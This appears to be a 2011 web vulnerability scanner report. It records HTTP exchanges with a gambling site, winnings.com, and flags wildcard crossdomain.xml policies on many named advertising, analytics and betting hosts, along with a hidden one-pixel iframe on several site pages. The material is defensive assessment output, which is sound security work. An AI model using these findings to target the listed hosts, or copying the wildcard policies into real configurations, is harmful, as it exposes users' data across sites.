HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:39:18 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:39:18 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:39:20 GMT Connection: close Content-Length: 22304 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA <title>Cash Prizes - Learn how to make money online | H ...[SNIP]... <a class="cssMenui" href="http://www.vincite ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /instant-games |
GET /instant-games HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:38 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:38 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:43:40 GMT Connection: close Content-Length: 24674 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title> <link rel="alternate" type ...[SNIP]... ', ' + gid;gid = '&GID=' + gid;}window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /instant-games |
GET /instant-games HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:41:25 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:41:25 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:41:28 GMT Connection: close Content-Length: 24629 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title> <link rel="alternate" type ...[SNIP]... <iframe style='display:none' src='http://www.info ' border='0' height='1' width='1' bgcolor='#999999' frameborder='0'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /instant-games |
GET /instant-games HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:38:37 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:38:37 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:38:38 GMT Connection: close Content-Length: 24568 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title> <link rel="alternate" type ...[SNIP]... <a class="cssMenui" href="http://www.vincite ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /lottery-scratch-cards |
GET /lottery-scratch-cards HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:31 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:31 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:43:33 GMT Connection: close Content-Length: 22517 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA <title>Lottery scratch cards - Lottery Scratchcards Gam ...[SNIP]... ', ' + gid;gid = '&GID=' + gid;}window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /lottery-scratch-cards |
GET /lottery-scratch-cards HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:39:21 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:39:21 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:39:22 GMT Connection: close Content-Length: 22461 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA <title>Lottery scratch cards - Lottery Scratchcards Gam ...[SNIP]... <a class="cssMenui" href="http://www.vincite ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /scratch-cards |
GET /scratch-cards HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:43:58 GMT Connection: close Content-Length: 24995 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title> <link rel="alternate" type ...[SNIP]... ', ' + gid;gid = '&GID=' + gid;}window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /scratch-cards |
GET /scratch-cards HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:41:31 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:41:31 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:41:32 GMT Connection: close Content-Length: 24950 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title> <link rel="alternate" type ...[SNIP]... <iframe style='display:none' src='http://www.info ' border='0' height='1' width='1' bgcolor='#999999' frameborder='0'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /scratch-cards |
GET /scratch-cards HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:38:19 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:38:19 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:38:21 GMT Connection: close Content-Length: 24889 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title> <link rel="alternate" type ...[SNIP]... <a class="cssMenui" href="http://www.vincite ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /site-map |
GET /site-map HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:40:02 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:40:02 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:40:03 GMT Connection: close Content-Length: 18757 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA <title> Site map..| Winnings.com</title> <link rel="a ...[SNIP]... <a class="cssMenui" href="http://www.vincite ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /slots |
GET /slots HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:41:17 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:41:17 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:41:20 GMT Connection: close Content-Length: 24817 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win ...[SNIP]... <iframe style='display:none' src='http://www.info ' border='0' height='1' width='1' bgcolor='#999999' frameborder='0'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /slots |
GET /slots HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:43:59 GMT Connection: close Content-Length: 24865 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win ...[SNIP]... ', ' + gid;gid = '&GID=' + gid;}window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winnings.com |
Path: | /slots |
GET /slots HTTP/1.1 Host: www.winnings.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: qtrans_cookie_test |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.13 Set-Cookie: qtrans_cookie_test Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:38:57 GMT; path=/; domain=.winnings.com Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:38:57 GMT; path=/; domain=.winnings.com X-Pingback: http://winnings.com Date: Mon, 16 May 2011 12:39:00 GMT Connection: close Content-Length: 24759 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win ...[SNIP]... <a class="cssMenui" href="http://www.vincite ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad-emea.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT Date: Mon, 16 May 2011 11:41:04 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT Date: Mon, 16 May 2011 12:49:31 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Tue, 17 May 2011 12:49:29 GMT Date: Mon, 16 May 2011 12:49:29 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bingo.bet365.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bingo.bet365.com |
HTTP/1.1 200 OK Content-Length: 234 Content-Type: text/xml Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT Accept-Ranges: bytes ETag: "80d364f7dd2ec91:6dc0" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:35:36 GMT Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://bingo.betsson.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bingo.betsson.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 08:32:00 GMT Last-Modified: Wed, 12 Jan 2011 16:05:16 GMT Accept-Ranges: bytes ETag: "1CBB27280604600" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:58:52 GMT Connection: close Content-Length: 378 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="192.168.104.199"/> <allow-access-from domain="betsson.hs.llnwd.net"/> <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.betrad.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.betrad.com |
HTTP/1.0 200 OK Server: Apache ETag: "623d3896f3768c2bad5 Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT Accept-Ranges: bytes Content-Length: 204 Content-Type: application/xml Date: Mon, 16 May 2011 12:52:25 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://casino.bet365.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: casino.bet365.com |
HTTP/1.1 200 OK Content-Length: 234 Content-Type: text/xml Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT Accept-Ranges: bytes ETag: "80d364f7dd2ec91:7066" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:32:32 GMT Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d.tradex.openx.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d.tradex.openx.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:52:09 GMT Server: Apache Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT ETag: "60fa3-c7-497e11c2d28c0" Accept-Ranges: bytes Content-Length: 199 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d.xp1.ru4.com |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Mon, 16 May 2011 12:52:13 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/xml Last-modified: Mon, 22 Nov 2010 21:31:41 GMT Content-length: 202 Etag: "ca-4ceae13d" Accept-ranges: bytes Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://games.bet365.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: games.bet365.com |
HTTP/1.1 200 OK Content-Length: 234 Content-Type: text/xml Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT Accept-Ranges: bytes ETag: "80d364f7dd2ec91:6dc0" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:02:24 GMT Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://getclicky.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: getclicky.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:45:21 GMT Server: Apache Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT ETag: "958b98-c9-433f845a21a00" Accept-Ranges: bytes Content-Length: 201 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://in.getclicky.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: in.getclicky.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:41:35 GMT Server: Apache Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT ETag: "5d8140-c9-4963cf9438ac0" Accept-Ranges: bytes Content-Length: 201 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://in.getclicky.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: in.getclicky.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:35:18 GMT Server: Apache Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT ETag: "5d8140-c9-4963cf9438ac0" Accept-Ranges: bytes Content-Length: 201 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://l.betrad.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: l.betrad.com |
HTTP/1.0 200 OK P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Type: text/xml Cache-Control: no-cache, no-store, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Content-Length: 212 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" /> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://log30.doubleverify |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: log30.doubleverify.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT Accept-Ranges: bytes ETag: "034d21c5697ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:53:27 GMT Connection: close Content-Length: 378 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-dom ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://m.xp1.ru4.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: m.xp1.ru4.com |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Mon, 16 May 2011 12:52:11 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/xml Last-modified: Mon, 22 Nov 2010 21:32:05 GMT Content-length: 202 Etag: "ca-4ceae155" Accept-ranges: bytes Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://neogames-tech.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: neogames-tech.com |
HTTP/1.1 200 OK Content-Length: 287 Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 11:24:37 GMT Accept-Ranges: bytes ETag: "34cdc3c714becb1:b9f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:38:41 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 12:52:09 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Tue, 17 May 2011 12:49:40 GMT Content-Type: text/xml Content-Length: 207 Date: Mon, 16 May 2011 12:49:40 GMT Server: QS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://platform.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: platform.ak.fbcdn.net |
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Mon, 16 May 2011 12:47:15 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://poker.bet365.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: poker.bet365.com |
HTTP/1.1 200 OK Content-Length: 234 Content-Type: text/xml Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT Accept-Ranges: bytes ETag: "80d364f7dd2ec91:76ef" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:20:41 GMT Connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://res.mccont.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: res.mccont.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Sun, 04 Jan 2009 11:17:10 GMT ETag: "34ec3d0-cb-45fa650b39980 Accept-Ranges: bytes Content-Length: 203 Content-Type: text/xml Date: Mon, 16 May 2011 12:49:29 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s.mcstatic.com |
Path: | /crossdomain.xml |
